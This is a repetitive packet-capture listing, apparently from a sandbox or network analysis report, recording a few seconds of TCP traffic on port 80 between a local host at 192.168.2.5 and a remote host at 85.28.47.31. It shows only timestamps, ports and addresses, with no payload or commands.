Jul 26, 2024 17:56:07.037893057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037895918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037903070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037911892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037935972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037939072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037950993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037960052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037967920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037976980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037981033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.037986040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.037997961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038006067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038007975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038017035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038027048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038036108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038038969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038045883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038055897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038059950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038079023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038105011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038105011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038458109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038503885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038672924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038712978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038744926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038758993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038767099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038777113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038785934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.038796902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038811922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.038834095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039081097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039092064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039102077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039112091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039122105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039132118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039138079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039167881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039186954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039509058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039520025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039527893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039566040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039589882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039645910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039659023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039669037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039673090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039685011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039690971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039696932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039701939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039706945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039711952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039716005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039726019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039735079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039736032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039743900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039752960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039756060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039762974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039772034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039777994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039787054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039796114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039798021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039805889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039814949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.039814949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039835930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.039869070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040441990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040512085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040518045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040529013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040538073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040548086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040556908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040563107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040566921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040571928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040575981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040580988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040590048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040594101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040595055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040599108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040626049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040643930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040664911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040674925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040685892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040694952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040703058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040704012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040715933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.040724993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040745974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.040772915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041388035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041397095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041409016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041419029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041424990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041472912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041472912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041495085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041522026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041532040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041537046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041544914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041553974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041563988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041565895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041574001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041584015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041587114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041593075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041598082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.041619062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.041631937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042078972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042088985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042099953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042109013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042119026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042123079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042128086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042161942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042175055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042184114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042191029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042191029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042193890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042197943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042203903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042212963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042220116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042222023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042232037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042241096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042264938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042287111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042304039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042315960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042327881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042337894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042352915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042354107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042393923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.042943954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042956114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.042989969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043018103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043086052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043101072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043111086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043122053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043132067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043133020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043143034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043154001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043154955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043164968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043174982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043175936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043185949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043200016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.043204069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043222904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.043242931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.318387032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.328011036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.869615078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:07.869874954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:07.996534109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:08.200387955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:08.513005972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:09.122256994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:09.382145882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:09.384185076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:09.384223938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:09.396147966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:09.923981905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:09.924084902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:10.660952091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:10.764314890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:11.990540028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:11.990777016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:11.992377996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:11.992432117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:11.998151064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:11.998207092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.372977972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.384016991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578092098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578114033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578124046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578135967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578146935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578160048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.578232050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.578254938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.580509901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580526114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580537081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580548048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580559969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580570936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.580595970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.580619097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640218973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640230894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640242100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640305996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640316963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640326977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640342951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640352964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640363932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640367031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640440941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640440941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640664101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640681982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640692949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640703917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640716076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640724897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640736103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640748024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640749931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640760899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640769958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640774012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640791893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640795946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640803099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640815020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640819073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640825987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640839100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640840054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640850067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.640872002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.640894890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725121975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725135088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725145102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725162029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725172043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725183964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725258112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725269079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725313902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725398064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725409031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725428104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725440025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725444078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725455999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725474119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725481033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725502014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725505114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725516081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725528955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725537062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725558996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725559950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725594044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725620031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725708961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725719929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725730896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725742102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725759029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725765944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725789070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725791931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725812912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725816011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725836992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725837946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725850105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725862980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725869894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725886106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725893021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725917101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.725919962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.725970030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726020098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726106882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726118088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726128101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726139069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726152897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726161957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726183891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726185083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726202965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726207972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726218939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726232052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726233006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726243973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726249933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726254940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726259947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726265907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726267099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726272106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726278067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726289034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726289988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.726300001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726310968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.726316929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.727432013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811526060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811587095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811621904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811634064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811655045 CEST	80	49704	85.28.47.31	192.168.2.5
